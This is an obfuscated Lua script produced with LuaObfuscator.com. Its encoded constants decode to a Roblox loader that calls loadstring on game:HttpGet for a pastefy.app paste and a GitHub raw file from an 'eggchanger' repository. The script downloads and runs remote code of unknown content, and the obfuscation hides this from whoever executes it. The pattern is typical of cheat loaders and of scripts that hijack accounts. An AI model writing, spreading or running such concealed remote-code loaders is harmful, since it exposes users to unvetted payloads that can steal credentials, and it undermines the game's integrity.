--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v100=v5(v84,v19);v19=nil;return v100;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -1)^(v32-(2 -(1 -0)))))%((621 -(555 + 64))^(((v33-((1997 -(68 + 997)) -(857 + 74))) -(v32-(569 -(367 + 201)))) + ((834 + 94) -(214 + 713)))) ;return v86-(v86%(1 + 0)) ;end end else local v87=0;local v88;while true do if (v87==0) then v88=2^(v32-((1271 -(226 + 1044)) + 0)) ;return (((v31%(v88 + v88))>=v88) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end if (v35==(1 + 0)) then return (v37 * (1213 -(892 + 65))) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -(2 + 0)) );v18=v18 + 4 ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * (436 -(67 + 113))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + (1486 -(998 + 488)))) then v45=1;v46=(v20(v44,1,79 -59 ) * ((954 -(255 + 547 + 150))^32)) + v43 ;v42=5 -3 ;end if (v42==((3 + 0) -1)) then v47=v20(v44,16 + 5 ,1028 -(915 + 82) );v48=((v20(v44,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;v42=6 -3 ;end if (v42==(6 -3)) then if (v47==((772 -(201 + 571)) + 0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=792 -(368 + 423) ;v45=0 -0 ;end elseif (v47==(2065 -(10 + 8))) then return ((v46==(0 -0)) and (v48 * (1/(442 -((1554 -(116 + 1022)) + 26))))) or (v48 * NaN) ;end return v8(v48,v47-(3266 -(9338 -7095)) ) * (v45 + (v46/((1 + 1)^((54 + 37) -(142 -103))))) ;end if (v42==(438 -(145 + (1040 -747)))) then v43=v23();v44=v23();v42=(1290 -(814 + 45)) -(44 + 386) ;end end end local function v25(v49) local v50;if  not v49 then local v89=0 -0 ;while true do if (v89==(0 + 0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v66=(1081 -(1020 + 60)) -0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if ((1 -0)==v68) then if (v52~=(2 -0)) then else v57[ #"-19"]=(function() return v21();end)();for v101= #"}",v23() do local v102=(function() return v21();end)();if (v20(v102, #"{", #"}")~=0) then else local v125=(function() return 0;end)();local v126=(function() return;end)();local v127=(function() return;end)();local v128=(function() return;end)();while true do if (v125==(1787 -(599 + 1185))) then if (v20(v127, #"xnx", #"xxx")== #"]") then v128[ #"0313"]=(function() return v59[v128[ #"http"]];end)();end v54[v101]=(function() return v128;end)();break;end if (v125~=1) then else local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();while true do if (v175~=(0 + 0)) then else v176=(function() return 574 -(507 + 67) ;end)();while true do if (v176~=0) then else local v187=(function() return 0;end)();while true do if (v187==(1750 -(1013 + 736))) then v176=(function() return 1;end)();break;end if (v187~=0) then else v128=(function() return {v22(),v22(),nil,nil};end)();if (v126==0) then local v188=(function() return 0 + 0 ;end)();local v189=(function() return;end)();while true do if (v188~=(0 -0)) then else v189=(function() return 0 -0 ;end)();while true do if (v189==(867 -(550 + 317))) then v128[ #"xnx"]=(function() return v22();end)();v128[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v126== #"}") then v128[ #"xxx"]=(function() return v23();end)();elseif (v126==(2 -0)) then v128[ #"gha"]=(function() return v23() -(2^16) ;end)();elseif (v126~= #"-19") then else local v196=(function() return 0 -0 ;end)();local v197=(function() return;end)();while true do if (v196~=0) then else v197=(function() return 0;end)();while true do if (v197~=0) then else v128[ #"-19"]=(function() return v23() -((5 -3)^(301 -(134 + 151))) ;end)();v128[ #".com"]=(function() return v22();end)();break;end end break;end end end v187=(function() return 1;end)();end end end if (v176==(1666 -(970 + 695))) then v125=(function() return 2;end)();break;end end break;end end end if (v125~=(3 -1)) then else if (v20(v127, #" ", #"|")== #",") then v128[2]=(function() return v59[v128[1992 -(582 + 1408) ]];end)();end if (v20(v127,2,2)~= #"\\") then else v128[ #"-19"]=(function() return v59[v128[ #"91("]];end)();end v125=(function() return 10 -7 ;end)();end if (v125~=0) then else v126=(function() return v20(v102,2 -0 , #"xxx");end)();v127=(function() return v20(v102, #"xnxx",6);end)();v125=(function() return 3 -2 ;end)();end end end end for v103= #"[",v23() do v55,v103,v28=(function() return v53(v55,v103,v28);end)();end return v57;end break;end if ((1824 -(1195 + 629))==v68) then if (v52~=0) then else local v98=(function() return 0 -0 ;end)();while true do if (v98==1) then v55=(function() return {};end)();v56=(function() return {};end)();v98=(function() return 2;end)();end if (v98~=(243 -(187 + 54))) then else v52=(function() return 781 -(162 + 618) ;end)();break;end if (v98==0) then v53=(function() return function(v136,v137,v138) local v139=(function() return 0;end)();local v140=(function() return;end)();while true do if (0==v139) then v140=(function() return 0 + 0 ;end)();while true do if ((0 + 0)==v140) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185==(0 -0)) then v186=(function() return 0 -0 ;end)();while true do if (v186~=0) then else local v190=(function() return 0;end)();while true do if (v190==0) then v136[v137-#"~" ]=(function() return v138();end)();return v136,v137,v138;end end end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v98=(function() return 1;end)();end end end if (v52~=(1 + 0)) then else local v99=(function() return 0;end)();while true do if (v99==(1636 -(1373 + 263))) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v99=(function() return 1;end)();end if (v99~=(1001 -(451 + 549))) then else v59=(function() return {};end)();for v132= #"{",v58 do local v133=(function() return 0 + 0 ;end)();local v134=(function() return;end)();local v135=(function() return;end)();while true do if (v133==(0 -0)) then local v180=(function() return 0;end)();while true do if ((1 -0)~=v180) then else v133=(function() return 1;end)();break;end if (v180~=0) then else v134=(function() return v21();end)();v135=(function() return nil;end)();v180=(function() return 1;end)();end end end if (v133==1) then if (v134== #"<") then v135=(function() return v21()~=(1384 -(746 + 638)) ;end)();elseif (v134==2) then v135=(function() return v24();end)();elseif (v134== #"xnx") then v135=(function() return v25();end)();end v59[v132]=(function() return v135;end)();break;end end end v99=(function() return 1 + 1 ;end)();end if (v99~=(2 -0)) then else v52=(function() return 343 -(218 + 123) ;end)();break;end end end v68=(function() return 1582 -(1535 + 46) ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[3];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=561 -(306 + 254) ;local v74= -(1 + 0 + 0);local v75={};local v76={...};local v77=v12("#",...) -((3146 -1678) -(899 + 568)) ;local v78={};local v79={};for v90=0 + 0 + 0 ,v77 do if ((3244>=1055) and (v90>=v71)) then v75[v90-v71 ]=v76[v90 + (2 -1) ];else v79[v90]=v76[v90 + (604 -(268 + 335)) ];end end local v80=(v77-v71) + (291 -(60 + 230)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[573 -(426 + 146) ];if (v82<=(1 + 2)) then if (v82<=(1457 -(282 + 1174))) then if ((v82>(811 -(569 + 242))) or (3313<=1778)) then v79[v81[2]]();else local v104=v81[5 -3 ];local v105=v79[v81[1 + 2 ]];v79[v104 + 1 ]=v105;v79[v104]=v105[v81[4]];end elseif (v82==((522 + 504) -(706 + 318))) then v79[v81[1253 -(721 + 530) ]]=v62[v81[1274 -(945 + 326) ]];else local v111=0 -0 ;local v112;while true do if (v111==(0 + 0)) then v112=v81[702 -(271 + 429) ];v79[v112]=v79[v112](v13(v79,v112 + 1 + 0 + 0 ,v74));break;end end end elseif (v82<=(1505 -((3709 -2301) + 92))) then if ((v82>(1090 -(461 + 625))) or (1421>=2104)) then v79[v81[(3307 -2017) -(993 + 295) ]]=v81[1 + (1553 -(1126 + 425)) ];else local v115=1171 -(418 + 753) ;local v116;local v117;local v118;local v119;local v120;while true do if ((1812<=3249) and (v115==(1 + 1))) then v73=v73 + 1 + 0 ;v81=v69[v73];v120=v81[1 + 1 ];v119=v79[v81[3]];v115=1 + 2 ;end if ((1623<=1957) and (v115==(539 -(406 + 123)))) then v119=v79[v81[1772 -(1749 + (425 -(118 + 287))) ]];v79[v120 + 1 + 0 ]=v119;v79[v120]=v119[v81[4]];break;end if (v115==(1323 -(1249 + 73))) then v79[v81[2]]=v62[v81[3]];v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[1147 -((1826 -1360) + 679) ]]=v62[v81[6 -3 ]];v115=5 -3 ;end if ((4412==4412) and (v115==(1904 -(106 + 1794)))) then v79[v81[1 + 1 ]]=v81[1 + 2 ];v73=v73 + (1122 -(118 + 1003)) ;v81=v69[v73];v120=v81[5 -3 ];v115=13 -8 ;end if (6==v115) then v73=v73 + ((336 -221) -((381 -(142 + 235)) + 110)) ;v81=v69[v73];v120=v81[586 -((258 -201) + 527) ];v79[v120]=v79[v120](v13(v79,v120 + (1428 -(41 + 1386)) ,v74));v115=(24 + 86) -(17 + 86) ;end if ((1750>=842) and (v115==(7 + 2))) then v79[v81[(980 -(553 + 424)) -1 ]]=v62[v81[8 -5 ]];v73=v73 + (167 -((230 -108) + 44)) ;v81=v69[v73];v120=v81[2 -0 ];v115=10;end if ((4372>1850) and (v115==7)) then v73=v73 + ((3 + 0) -2) ;v81=v69[v73];v79[v81[2 + 0 ]]();v73=v73 + 1 ;v115=8;end if (v115==0) then v116=nil;v117,v118=nil;v119=nil;v120=nil;v115=1;end if (v115==(1 + 4 + 0)) then v117,v118=v72(v79[v120](v13(v79,v120 + (1 -(0 + 0)) ,v81[(29 + 39) -(30 + 35) ])));v74=(v118 + v120) -(1 + 0) ;v116=1257 -(1043 + 214) ;for v177=v120,v74 do v116=v116 + 1 ;v79[v177]=v117[v116];end v115=22 -16 ;end if (v115==((694 + 521) -(323 + 889))) then v79[v120 + (2 -1) ]=v119;v79[v120]=v119[v81[584 -(361 + 219) ]];v73=v73 + 1 ;v81=v69[v73];v115=4;end if ((328 -(53 + 267))==v115) then v81=v69[v73];v79[v81[2]]=v62[v81[1 + 2 ]];v73=v73 + (2 -1) ;v81=v69[v73];v115=422 -(15 + 398) ;end end end elseif (v82>(988 -(18 + (2685 -1721)))) then local v121=v81[7 -5 ];local v122,v123=v72(v79[v121](v13(v79,v121 + 1 + 0 ,v81[3])));v74=(v123 + v121) -(1 + 0) ;local v124=(1903 -1053) -(20 + 830) ;for v129=v121,v74 do v124=v124 + 1 + 0 ;v79[v129]=v122[v124];end else do return;end end v73=v73 + (127 -(116 + 10)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!053Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F5636626B49786E6B2F726177034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F47726F7744757065722F652Q676368616E6765722F726566732F68656164732F6D61696E2F652Q67000F3Q0012043Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q0001000100124Q00013Q00122Q000100023Q00202Q000100010003001205000300054Q0007000100034Q00035Q00022Q00013Q000100012Q00063Q00017Q00",v9(),...);
